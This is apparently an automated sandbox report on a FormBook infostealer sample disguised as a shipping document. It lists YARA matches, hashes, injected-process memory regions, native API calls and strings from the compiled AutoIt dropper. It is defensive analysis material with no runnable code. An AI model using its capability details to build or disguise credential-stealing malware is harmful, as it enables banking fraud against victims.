            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E8CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E8CB26

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: This is a third-party compiled AutoIt script.0_2_00E03B4C
            Source: SHIPPING DOC MBL+HBL.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: SHIPPING DOC MBL+HBL.exe, 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5dd6c1dc-6
            Source: SHIPPING DOC MBL+HBL.exe, 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_cde0112f-4
            Source: SHIPPING DOC MBL+HBL.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_28e6c405-b
            Source: SHIPPING DOC MBL+HBL.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_06c503c5-4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C4F3 NtClose,1_2_0042C4F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,1_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274340 NtSetContextThread,1_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274650 NtSuspendThread,1_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AD0 NtReadFile,1_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F30 NtCreateSection,1_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FE0 NtCreateFile,1_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EA0 NtAdjustPrivilegesToken,1_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C60 NtCreateKey,1_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CA0 NtQueryInformationToken,1_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273090 NtSetValueKey,1_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D70 NtOpenThread,1_2_03273D70
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00E6A279
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E58638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E58638
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E65264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E65264
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E0E8000_2_00E0E800
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2DAF50_2_00E2DAF5
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E0FE400_2_00E0FE40
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E0E0600_2_00E0E060
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E141400_2_00E14140
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E223450_2_00E22345
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E804650_2_00E80465
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E364520_2_00E36452
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E325AE0_2_00E325AE
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2277A0_2_00E2277A
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E808E20_2_00E808E2
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E168410_2_00E16841
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E369C40_2_00E369C4
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E189680_2_00E18968
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E5E9280_2_00E5E928
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E689320_2_00E68932
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E3890F0_2_00E3890F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2CCA10_2_00E2CCA1
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E36F360_2_00E36F36
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E170FE0_2_00E170FE
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E131900_2_00E13190
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E012870_2_00E01287
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2F3590_2_00E2F359
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E233070_2_00E23307
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E156800_2_00E15680
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E216040_2_00E21604
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E158C00_2_00E158C0
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E278130_2_00E27813
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E21AF80_2_00E21AF8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E39C350_2_00E39C35
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E87E0D0_2_00E87E0D
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2BF260_2_00E2BF26
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E21F100_2_00E21F10
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00FEADF80_2_00FEADF8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185731_2_00418573
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100331_2_00410033
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030971_2_00403097
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030A01_2_004030A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0B31_2_0040E0B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A301_2_00402A30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EAD31_2_0042EAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004034301_2_00403430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024D01_2_004024D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE131_2_0040FE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026A01_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041674E1_2_0041674E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167531_2_00416753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA3521_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F01_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033003E61_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E02741_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C02C01_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032301001_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA1181_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C81581_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F41A21_2_032F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033001AA1_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F81CC1_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D20001_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032407701_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032647501_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C01_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C6E01_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032405351_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033005911_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E44201_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F24461_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EE4F61_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB401_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F6BD71_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA801_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032569621_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A01_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330A9A61_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324A8401_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032428401_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032268B81_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E8F01_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03282F281_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260F301_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E2F301_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4F401_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BEFA01_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232FC81_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEE261_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240E591_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252E901_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FCE931_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEEDB1_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324AD001_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DCD1F1_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03258DBF1_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323ADE01_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240C001_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0CB51_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230CF21_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F132D1_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322D34C1_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0328739A1_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032452A01_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E12ED1_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325D2F01_2_0325D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B2C01_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327516C1_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322F1721_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330B16B1_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324B1B01_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F70E91_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF0E01_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EF0CC1_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032470C01_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF7B01_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032856301_2_03285630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F16CC1_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F75711_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DD5B01_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033095C31_2_033095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF43F1_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032314601_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFB761_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FB801_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B5BF01_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327DBF91_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B3A6C1_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFA491_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7A461_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DDAAC1_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03285AA01_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E1AA31_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EDAC61_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D59101_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032499501_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B9501_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AD8001_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032438E01_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFF091_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFFB11_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03241F921_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD21_2_03203FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD51_2_03203FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03249EB01_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7D731_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03243D401_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F1D5A1_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FDC01_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B9C321_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFCF21_2_032FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 103 times
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: String function: 00E28A80 appears 42 times
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: String function: 00E07F41 appears 35 times
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: String function: 00E20C63 appears 70 times
            Source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708707067.0000000003B93000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOC MBL+HBL.exe
            Source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709933601.0000000003D8D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOC MBL+HBL.exe
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
